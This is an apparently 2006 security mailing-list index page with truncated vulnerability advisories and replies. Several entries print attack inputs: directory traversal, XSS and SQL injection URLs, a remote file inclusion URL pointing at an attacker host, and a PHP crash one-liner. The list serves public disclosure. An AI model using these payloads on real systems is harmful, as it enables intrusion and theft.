|
Prev week |
Colapse all |
Post message
[SECURITY] [DSA 1032-1] New zope-cmfplone packages fix unprivileged data manipulation 2006-04-12 Moritz Muehlenhoff (jmm debian org) Microsoft Internet Explorer DBCS Remote Memory Corruption Vulnerability 2006-04-12 Sowhat (smaillist gmail com) Microsoft Internet Explorer DBCS Remote Memory Corruption Vulnerability By Sowhat of Nevis Labs Date: 2006.04.11 http://www.nevisnetworks.com http://secway.org/advisory/AD20060411.txt http://www.microsoft.com/technet/security/bulletin/MS06-013.mspx CVE: CVE-2006-1189 Vendor Microsoft Inc. Prod [ more ] [ reply ] 2nd European Conference on Computer Network Defense (EC2ND) 2006-04-11 Blyth A J C (Comp) (ajcblyth glam ac uk) Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer POC 2006-04-11 phaas redspin com Ultr@VNC 1.0.1 Client POC Code -- Though the Server appears safe against remote code execution, the client exploitation is trivial with OllyDbg. The following POC binds to port 5900 and executes a buffer overflow on vulnerable clients that connect. The client machine will then spawn an instance of [ more ] [ reply ] SAXoPRESS - directory traversal 2006-04-11 securiteam datasec no SAXoPRESS is a content management system, mainly used for news publishing. A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and possibly execute arbitrary commands. Example exploit: http://example.com/apps/pbcs.dll/misc?url=../../../../ [ more ] [ reply ] Re: google xss 2006-04-10 pagvac (unknown pentester gmail com) Interesting that it's *not* choosing a tld different to ".com" what triggers the bug, but rather the language field ("hl"). In other words, if we change [http://www.google.ae/search?hl=ar&q=<script>alert("1")</script>&meta=] to [http://www.google.com/search?hl=ar&q=<script>alert("1")</script>&meta= [ more ] [ reply ] IT Underground, London 2006 - call for papers 2006-04-11 it_underground gazeta pl Hello, I'd like to announce the call for papers for the IT Underground 2006, a two-day conference organized by Software Conferences and hakin9.lab team in 28-29 June 2006, London, UK. IT Underground 2006 is a sixth edition of a conference dedicated to IT security issues, where remarkable author [ more ] [ reply ] [ MDKSA-2006:071 ] - Updated xscreensaver packages fix clear-text password vulnerability 2006-04-11 security mandriva com AzDGVote File inclusion 2006-04-11 selfar2002 hotmail com AzDGVote File inclusion --------------------------------- Site:http://www.azdg.com/ Demo:http://www.azdg.com/scripts/AzDGVote/vote.php?id=1 --------------------------------------- File inclusion include $int_path."/AzDG.template.inc.php"; int_path parameter File inclusion Aut File vote.php,vi [ more ] [ reply ] [SRC-Telindus advisory] - HP System Management Homepage Remote Unauthorized Access 2006-04-11 SRC Telindus (research src telindus com) HP System Management Homepage Remote Unauthorized Access -------------------------------------------------------- [Vulnerability]: Remote Authentication Bypass [Product]: CompaqHTTPServer/9.9 HP System Management Homepage 2.1.3.132 and above [Platform]: Microsoft® Windows® - Linux operating system [ more ] [ reply ] Re: Bypassing ISA Server 2004 with IPv6 2006-04-10 noreply romainl com Hello: I must say, the title was alarming. But, the body shows someone who doesn't know the difference between an IPv4 and IPv6 network stack. They are different and require different rules. This is why many IDS/IPS/Firewall systems either offer limited or no support for IPv6. - Anon for my prote [ more ] [ reply ] Re: google xss 2006-04-10 Jim Ley (jim jibbering com) "Andy Meyers" <andy.meyers (at) hushmail (dot) com [email concealed]> wrote in message news:20060409235034.1AAAC17042 (at) smtp2.hushmail.com. (dot) . [email concealed] > My BlackICE stops this from XSS from happening, however changing the URL > from a .ae domain to a .com and leaving the rest in tact, I am then > prompted. > > http://www.google.com/sear [ more ] [ reply ] Re: Re: PHPList <= 2.10.2 remote commands execution 2006-04-11 rg viza gmail com Isn't this old news? Your app is a sieve if you run with register globals on (or have developed your own code to do the same thing and replace it). It's a disaster waiting to happen. In the PHP manual, the developers of PHP have posted a big fat warning about this. It's easier to secure your code [ more ] [ reply ] [eVuln] VNews Multiple Vulnerabilities 2006-04-11 alex evuln com New eVuln Advisory: VNews Multiple Vulnerabilities http://evuln.com/vulns/112/summary.html --------------------Summary---------------- eVuln ID: EV0112 CVE: CVE-2006-1543 CVE-2006-1544 CVE-2006-1545 Software: VNews Sowtware's Web Site: http://www.vscripts.pl/?id=vnews Versions: 1.2 Critical Level: [ more ] [ reply ] Confixx 3.1.2 <= SQL Injection 2006-04-11 sn4k3 23 gmail com // Confixx 3.1.2 <= SQL Injection // ----------------------------------------------------------------- [~] Advisory by: LoK-Crew ~ Snake_23 [-] Exploit: http://www.victim.com/user/index.php?SID=[SQL] [-] Googledork: inurl:confixx inurl:login|anmeldung [+] Greetz to: Bluegeek and Team.Rootbox [ [ more ] [ reply ] Tritanium Bulletin Board 1.2.3 - XSS 2006-04-11 d4igoro gmail com Tritanium Bulletin Board 1.2.3 - XSS Vulnerabilities -------------------------------------------------------- Software: Tritanium Bulletin Board 1.2.3 Version: 1.2.3 Type: Cross Site Scripting Vulnerability Date: Die Apr 11 21:57:50 CEST 2006 Vendor: tritanium Page: http://www.tritanium-scripts.com/ [ more ] [ reply ] Manila <= 9.5 - XSS Vulnerabilities 2006-04-11 d4igoro gmail com Manila <= 9.5 - XSS Vulnerabilities -------------------------------------------------------- Software: Manila Version: <= 9.5 Type: Cross Side Scripting Vulnerability Date: Die Apr 11 21:33:54 CEST 2006 Vendor: UserLand Software Page: http://manila.userland.com/ Risc: Middle credits: -------------- [ more ] [ reply ] ZDI-06-007: Microsoft Windows Address Book (WAB) File Format Parsing Vulnerability 2006-04-11 zdi-disclosures 3com com ZDI-06-007: Microsoft Windows Address Book (WAB) File Format Parsing Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-007.html April 11, 2006 -- CVE ID: CVE-2006-0014 -- Affected Vendor: Microsoft -- Affected Products: Windows XP SP2 Windows 2000 SP4 -- TippingPoint(TM) IPS Cust [ more ] [ reply ] [eVuln] [V]Book Multiple Vulnerabilities 2006-04-11 alex evuln com New eVuln Advisory: [V]Book Multiple Vulnerabilities http://evuln.com/vulns/111/summary.html --------------------Summary---------------- eVuln ID: EV0111 CVE: CVE-2006-1561 CVE-2006-1562 CVE-2006-1563 Software: [V]Book Sowtware's Web Site: http://www.vscripts.pl/?id=vbook2 Versions: 2.0 Critical Le [ more ] [ reply ] Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities 2006-04-11 Sowhat (smaillist gmail com) Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities By Sowhat of Nevis Labs Date: 2006.03.22 http://www.nevisnetworks.com http://secway.org/advisory/AD20060322.txt CVE: CVE-2006-0323 US CERT: VU#231028 Vendor RealNetworks Inc. Products affected: Windows RealPlayer 8 RealOne Playe [ more ] [ reply ] phpListPro <= 2.0 - Remote File Include Vulnerability 2006-04-11 admin majorsecurity de phpListPro <= 2.0 - Remote File Include Vulnerability -------------------------------------------------------- Software: phpListPro Version: <=2.00 Type: Remote File Include Vulnerability Date: April, 11th 2006 Vendor: SmartISoft Page: http://smartisoft.com Risc: High Credits: ------------------ [ more ] [ reply ] INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit 2006-04-11 selfar2002 hotmail com Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit Discovery by SnIpEr_SA in (theme_path) this file : exploit: http://example.com/indexu/index.php?theme_path=http://evil.t [ more ] [ reply ] Re: function *() php/apache Crash PHP 4.4.2 and 5.1.2 2006-04-10 Michal Zalewski (lcamtuf dione ids pl) On Sun, 9 Apr 2006 cxib (at) securityreason (dot) com [email concealed] wrote: > CVE-2006-1549 > [...] > cxib# php -r 'function cx(){ cx(); } cx();' > Segmentation fault (core dumped) I wish I could refrain from asking... ...but how come there's no CVE entry for the bash script in my signature? -- ------------------------- [ more ] [ reply ] Confixx 3.1.2 <= Cross Site Scripting Vuln 2006-04-10 sn4k3 23 gmail com // Confixx 3.1.2 <= Cross Site Scripting Vuln // ----------------------------------------------------------------- [~] Advistory by: LoK-Crew ~ Snake_23 [-] Exploit: http://www.victim.com/allgemein_transfer.php?monat=4&jahr=[XSS] [-] Googledork: - [+] Greetz to: Bluegeek and Team.Rootbox [+] V [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1032-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
April 12th, 2006
[ more ] [ reply ]